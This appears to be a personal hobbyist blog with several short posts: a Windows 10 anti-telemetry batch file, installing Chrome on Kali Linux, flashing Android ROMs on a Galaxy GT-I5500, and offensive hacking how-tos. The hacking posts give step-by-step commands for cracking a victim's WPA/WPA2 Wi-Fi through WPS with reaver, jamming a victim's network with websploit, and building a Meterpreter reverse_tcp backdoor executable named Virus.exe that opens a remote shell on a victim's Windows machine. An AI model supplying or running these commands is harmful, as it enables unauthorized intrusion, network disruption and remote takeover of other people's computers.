Blogger Widgets

Σάββατο 30 Ιανουαρίου 2016

Stop Windows 10 from Spying You!

Ok guys i'm back...I created a new Batch file(It's an executable file that has .bat extension) this bat file i think will help a lot of people including me...It will stop Windows 10 from spying you! For some of you that you didn't know it Windows 10 is sending to Microsoft some data. This bat will:

  • Stop Data Logging Services
  • Configure Windows Explorer
  • Uninstall OneDrive
  • Stop Sending Telemetry Data to Microsoft

You can find this bat here:

https://gist.github.com/vip3rc0de/a0d2d90f52f9e7c90de0

Δευτέρα 15 Ιουλίου 2013

How to install Google Chrome in Kali Linux

Download deb package from Google Chrome's site (I choosed 32bit Version)
While downloading you will see the name of deb package its google-chrome-stable_current_i386.deb 
Now to install it open a terminal and type:
ls (to be sure that you have the deb file)
dpkg -i google-chrome-stable_current_i386.deb
After the process is finished you have to add it to the menu
go to Applications-Accessories-Main Menu 
Click on the internet icon and click "New Item" 
Name: Google Chrome
Command: google-chrome
OK now exit
Go to My Computer-File System-opt-google-chrome
Find google-chrome file and open it with Leafpad
on the last line you will see exec -a "$0" "$HERE/chrome"  "$@" add this --user-data-dir
The last line should be this: exec -a "$0" "$HERE/chrome"  "$@" --user-data-dir
Save it and exit

That's it....

How to hack WPA/WPA2 (No dictionary)

Open a terminal and type:
airmon-ng
airmon-ng stop wlan0 (In my case is wlan0)
airodump-ng wlan0 

Now open a new terminal and type
wash -i wlan0 -c 6 -C -s (Victim's channel may be different in my case is 6)

Now open another new terminal and type:
reaver -i wlan0 -b 00:11:22:33:44:55 --fail-wait=360 (Victim's BSSID...in my case is 00:11:22:33:44:55)

Wireless Jammer

Open terminal and type:
websploit
use wifi/wifi_jammer
and then type
set ESSID Router (In my case is Router the victim's name)
set BSSID 00:11:22:33:44:55 (BSSID is the mac of victim's router 00:11:22:33:44:55 is an example only)
set channel 6 (The victim's channel)
RUN

That's it guys...If you want to stop the attack CTRL + C otherwise it won't stop

Κυριακή 16 Δεκεμβρίου 2012

Backdoor Windows

Open a new console and type:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 x > /root/Desktop/Virus.exe
(In my case is 192.168.1.1 and i choosed the name Virus...You can choose whatever you want)

After the file is created open another terminal and type:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST=192.168.1.1
exploit

When you see Sending stage........ that means that the victim opened your file...and when you see the console saying meterpreter > that means that you are in the victim's system and console is waiting for commands...
For example you want to create a folder type:
shell
cd /
mkdir You have been hacked by GRDriftKing

The folder is created in C:\ with the name You have been hacked by GRDriftKing

Δευτέρα 22 Οκτωβρίου 2012

MAD TEAM ROM (GT-I5500)

Today my friend has some problems with his phone....Old designed GT-I5500 with slow rom bad design and he bored it sooooo if you have the same problems too...Just i found this rom with it's Basebands...
The rom is created BY MAD TEAM so i don't own this project....(The rom isn't tested by me...)


Download Links:
Mad Team Baseband
http://www.mediafire.com/?ylwxr1kv13kb0fr

Mad Team ROM 2.5 Final
http://www.mediafire.com/?gk5tm3k7o7b1hmo

Δευτέρα 8 Οκτωβρίου 2012

Galaxy GT-I5500 Clockwork Mod + Cyanogen Mod 7



First go to Standard Recovery Mode...For help see the image....




Then open Odin and plug your phone...you will see something like this...



And do this....



1) Load Ops
2) Open Package
3) Load Open Package
4) Start
5) After 5:08 Minutes you will see pass and your phone should be in Clockwork Mod...

In Clockwork Mod you will use Volume Up & Volume Down to Navigate and the Middle Button to Enter Menu

Download Links:
Odin+Ops+Package
http://www.mediafire.com/?wjows3sxhuyagw9

Cyanogen Mod 7+gapps
http://www.mediafire.com/?kts4f7c1bs6857t
IP widget
Έχετε συνδεθεί στην σελίδα πριν:

Δευτερόλ.
GRDriftKing